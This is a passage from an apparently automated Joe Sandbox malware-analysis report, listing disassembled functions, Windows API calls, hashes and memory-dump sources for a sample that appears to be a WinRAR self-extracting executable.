                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_wcslen
                                                                                                                                                                            • String ID: BL&$VL&$`L&
                                                                                                                                                                            • API String ID: 3746244732-1923800042
                                                                                                                                                                            • Opcode ID: 52819a010a43765af44123afcdbd18fbc6ebd06c17bef99951de13157a23886e
                                                                                                                                                                            • Instruction ID: 6262558358f8d0500c0bc6eeae9f7a12ba07d7a3fa020618bd53c1458d78907d
                                                                                                                                                                            • Opcode Fuzzy Hash: 52819a010a43765af44123afcdbd18fbc6ebd06c17bef99951de13157a23886e
                                                                                                                                                                            • Instruction Fuzzy Hash: 98413B71A2010AAFDF04DFA8DD999EE77B9FF09304B104159F851E72A0DB309DA0DB64
                                                                                                                                                                            Function 0025FA79 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0025FEA7: GetCurrentProcess.KERNEL32(00020008,?), ref: 0025FEB6
                                                                                                                                                                              • Part of subcall function 0025FEA7: GetLastError.KERNEL32 ref: 0025FEE1
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,?), ref: 0025FB23
                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 0025FB31
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                            • String ID: .L&$8L&$tL&
                                                                                                                                                                            • API String ID: 1077098981-3905086209
                                                                                                                                                                            • Opcode ID: f055a077e6d30af9dc08c664f4fe07f4507c8aee149ad19e784c8dd340c48baf
                                                                                                                                                                            • Instruction ID: d32a39ced8e6d4bf16eda256c0bb89c4ac0666defa437506b1b648a8590edbe6
                                                                                                                                                                            • Opcode Fuzzy Hash: f055a077e6d30af9dc08c664f4fe07f4507c8aee149ad19e784c8dd340c48baf
                                                                                                                                                                            • Instruction Fuzzy Hash: C421F7B191020AEBDB10CF65E9899EEBBF8FF48315F10452AEC15E3150D734DA59CBA4
                                                                                                                                                                            Function 00263D64 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                            • String ID: BL&$LL&$Software\WinRAR SFX$jL&
                                                                                                                                                                            • API String ID: 2427045233-145528788
                                                                                                                                                                            • Opcode ID: eacdbb36c28d2226ce37e72988dcad6050daf42ad1c914bad877e60d52b9108f
                                                                                                                                                                            • Instruction ID: b5e05bb07322ca44466dad0cc4cf5dd9bf3b5c1b7244f07d892ae43d729cdfb4
                                                                                                                                                                            • Opcode Fuzzy Hash: eacdbb36c28d2226ce37e72988dcad6050daf42ad1c914bad877e60d52b9108f
                                                                                                                                                                            • Instruction Fuzzy Hash: 98215C71920219EFDB25DFA4EC89EEEBBB9FF88710F10441AF501A2150D7719AA4CB74
                                                                                                                                                                            Function 002607E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadBitmapW.USER32(00000065), ref: 002607F5
                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0026081A
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0026084C
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0026086F
                                                                                                                                                                              • Part of subcall function 0025EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00260845,00000066), ref: 0025EBE6
                                                                                                                                                                              • Part of subcall function 0025EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EBFD
                                                                                                                                                                              • Part of subcall function 0025EBD3: LoadResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC14
                                                                                                                                                                              • Part of subcall function 0025EBD3: LockResource.KERNEL32(00000000,?,?,?,00260845,00000066), ref: 0025EC23
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00260845,00000066), ref: 0025EC3E
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalLock.KERNEL32(00000000), ref: 0025EC4F
                                                                                                                                                                              • Part of subcall function 0025EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0025EC73
                                                                                                                                                                              • Part of subcall function 0025EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0025ECB8
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalUnlock.KERNEL32(00000000), ref: 0025ECD7
                                                                                                                                                                              • Part of subcall function 0025EBD3: GlobalFree.KERNEL32(00000000), ref: 0025ECDE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                            • String ID: ]
                                                                                                                                                                            • API String ID: 1797374341-3352871620
                                                                                                                                                                            • Opcode ID: 6446b3b5c7f0601a2868c98cccbc4ab99ec23fb912291e7b9cadaf15736667f3
                                                                                                                                                                            • Instruction ID: 60abcc0e8e21cbdcf1b3b1683eb758e24ca230eb495a2ed8fc509d5ba23912ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 6446b3b5c7f0601a2868c98cccbc4ab99ec23fb912291e7b9cadaf15736667f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 3901F931560216A7DB11AB74AC49B7F367AAFC0B56F060125FD00A72D1DF71CD295AE0
                                                                                                                                                                            Function 0026ED2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0026ECE0,00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002), ref: 0026ED4F
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0026ED62
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0026ECE0,00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002), ref: 0026ED85
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                            • Opcode ID: 53c497a67856684690c2661da8ba7f2fb77e707de924d38277988d714c509d0a
                                                                                                                                                                            • Instruction ID: 91c8b31ab47cd10d9d18c8f9b9de880bef818d702fa593823f3518603234b4dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 53c497a67856684690c2661da8ba7f2fb77e707de924d38277988d714c509d0a
                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF04434925118FBDF159FB4EC0DBAEBFB9EB04715F114168F809A6250CB3149D0CB90
                                                                                                                                                                            Function 0026631E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SleepConditionVariableCS.KERNELBASE(?,002662BB,00000064), ref: 00266341
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(002960E0,?,?,002662BB,00000064,?,?,?,?,00000000,0027A75D,000000FF), ref: 0026634B
                                                                                                                                                                            • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,002662BB,00000064,?,?,?,?,00000000,0027A75D,000000FF), ref: 0026635C
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(002960E0,?,002662BB,00000064,?,?,?,?,00000000,0027A75D,000000FF), ref: 00266363
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                            • String ID: `)
                                                                                                                                                                            • API String ID: 3269011525-3279841111
                                                                                                                                                                            • Opcode ID: 6608a4db5e46d35c5aafaf4f4084faf06e3b780782567c20c00e3ee8f469624a
                                                                                                                                                                            • Instruction ID: e89a179a3de50159c37b49a7244981be28044d54eeffb23c575ac3de403180ba
                                                                                                                                                                            • Opcode Fuzzy Hash: 6608a4db5e46d35c5aafaf4f4084faf06e3b780782567c20c00e3ee8f469624a
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BE01231561234EBCB121FA1FC4EB9D7FA8BF05B91F144069F90EA6160C66259B09BD4
                                                                                                                                                                            Function 00255094 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00256C5E: __EH_prolog3_GS.LIBCMT ref: 00256C65
                                                                                                                                                                              • Part of subcall function 00256C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00256C9A
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002550B3
                                                                                                                                                                            • GetProcAddress.KERNEL32(002951F8,CryptUnprotectMemory), ref: 002550C3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$DirectoryH_prolog3_System
                                                                                                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                            • API String ID: 270589589-1753850145
                                                                                                                                                                            • Opcode ID: 48fdaeb77086554872b0e2e4c6841be5c6de0553d152ef1f94c7f3b8700aef22
                                                                                                                                                                            • Instruction ID: 21f6ef4461f3850e39873345c563135c2b5cb32610bc45f63d2cd929f6bc113c
                                                                                                                                                                            • Opcode Fuzzy Hash: 48fdaeb77086554872b0e2e4c6841be5c6de0553d152ef1f94c7f3b8700aef22
                                                                                                                                                                            • Instruction Fuzzy Hash: 47E04F70820712DEC7305F74EC0D746BED45F1A715F20C82EA8DD93580D6B5E4A48B94
                                                                                                                                                                            Function 0026985A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AdjustPointer$_abort
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2252061734-0
                                                                                                                                                                            • Opcode ID: dc1a5906d701c677b3063b4d72d9414eb25688bca3af14b126614967a7ccd955
                                                                                                                                                                            • Instruction ID: ce4c3c53a374000e061f3a1d6001f3f08cba334179c48de491ba9aef96986fc2
                                                                                                                                                                            • Opcode Fuzzy Hash: dc1a5906d701c677b3063b4d72d9414eb25688bca3af14b126614967a7ccd955
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51F372A223029FDF289F54D845BBAB7ACEF41710F24452DE80657291EB31ECE5CB90
                                                                                                                                                                            Function 0024F3BE Relevance: 7.7, APIs: 5, Instructions: 161filetimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024F3C5
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,0024B749,?,?,?,?,?,?), ref: 0024F450
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 0024F4A7
                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 0024F569
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0024F570
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Create$CloseH_prolog3_HandleTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4002707884-0
                                                                                                                                                                            • Opcode ID: fc2e79210e46fd1d3b77fb6fd07f4cda7f3f5fc1e9bf8653f71125f3362d443e
                                                                                                                                                                            • Instruction ID: 5b53c0a081b3e8986bed89130bb45425490696ad1f6b3736d9127f2273a22e70
                                                                                                                                                                            • Opcode Fuzzy Hash: fc2e79210e46fd1d3b77fb6fd07f4cda7f3f5fc1e9bf8653f71125f3362d443e
                                                                                                                                                                            • Instruction Fuzzy Hash: 8551A270A20249ABDF19DFE4E945BEEBBB5AF48310F240129F541F72C0D7349A55CB24
                                                                                                                                                                            Function 00272BE0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00272BE9
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00272C0C
                                                                                                                                                                              • Part of subcall function 0027040E: RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00272C32
                                                                                                                                                                            • _free.LIBCMT ref: 00272C45
                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00272C54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                            • Opcode ID: 54dea7d4134a2070ed5b5d6a51b36022d889bc4b0145e3ea8f40b809536fc9b8
                                                                                                                                                                            • Instruction ID: 86f4ac0a51a9e0461741ef8c3ca6bb3be687a0d1ce5aa1cef58058b574b8bdcc
                                                                                                                                                                            • Opcode Fuzzy Hash: 54dea7d4134a2070ed5b5d6a51b36022d889bc4b0145e3ea8f40b809536fc9b8
                                                                                                                                                                            • Instruction Fuzzy Hash: 84012472621211FF33221A762C8CC3F2E6CDED2B60326412EF90CC2114DA708C1586B0
                                                                                                                                                                            Function 00270089 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(0026535E,0026535E,?,002701D8,00270451,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?), ref: 0027008E
                                                                                                                                                                            • _free.LIBCMT ref: 002700C3
                                                                                                                                                                            • _free.LIBCMT ref: 002700EA
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0026535E), ref: 002700F7
                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0026535E), ref: 00270100
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                            • Opcode ID: 5cc9a7e3143b8539bbd511678ded06744984d5672e7e05dd1fa8f0dded45a555
                                                                                                                                                                            • Instruction ID: 5dffaf039e251ce1ed36825049640d6e3fff1296ed24d83b8bd5b9a075fa7096
                                                                                                                                                                            • Opcode Fuzzy Hash: 5cc9a7e3143b8539bbd511678ded06744984d5672e7e05dd1fa8f0dded45a555
                                                                                                                                                                            • Instruction Fuzzy Hash: 48017D36171601EB83212B797DC9F2B211ADFC13707318028F50CA2182EFB09CBD4660
                                                                                                                                                                            Function 002734AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 002734C7
                                                                                                                                                                              • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
                                                                                                                                                                              • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
                                                                                                                                                                            • _free.LIBCMT ref: 002734D9
                                                                                                                                                                            • _free.LIBCMT ref: 002734EB
                                                                                                                                                                            • _free.LIBCMT ref: 002734FD
                                                                                                                                                                            • _free.LIBCMT ref: 0027350F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: c57e4b862331a049e62e7f76834e2aaf1981a08aeb13116c58e26d9d79ca8700
                                                                                                                                                                            • Instruction ID: b4adbcd569d526ac91ffe1d29bbeb6bd3e5f86c5319d08ed11d02c9dd0baceb5
                                                                                                                                                                            • Opcode Fuzzy Hash: c57e4b862331a049e62e7f76834e2aaf1981a08aeb13116c58e26d9d79ca8700
                                                                                                                                                                            • Instruction Fuzzy Hash: D5F06232525201E78624DF69F4C6C1677D9AB0431035D8846F00DF7900CBB0FD90CB60
                                                                                                                                                                            Function 0026F7C0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 0026F7DE
                                                                                                                                                                              • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
                                                                                                                                                                              • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
                                                                                                                                                                            • _free.LIBCMT ref: 0026F7F0
                                                                                                                                                                            • _free.LIBCMT ref: 0026F803
                                                                                                                                                                            • _free.LIBCMT ref: 0026F814
                                                                                                                                                                            • _free.LIBCMT ref: 0026F825
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
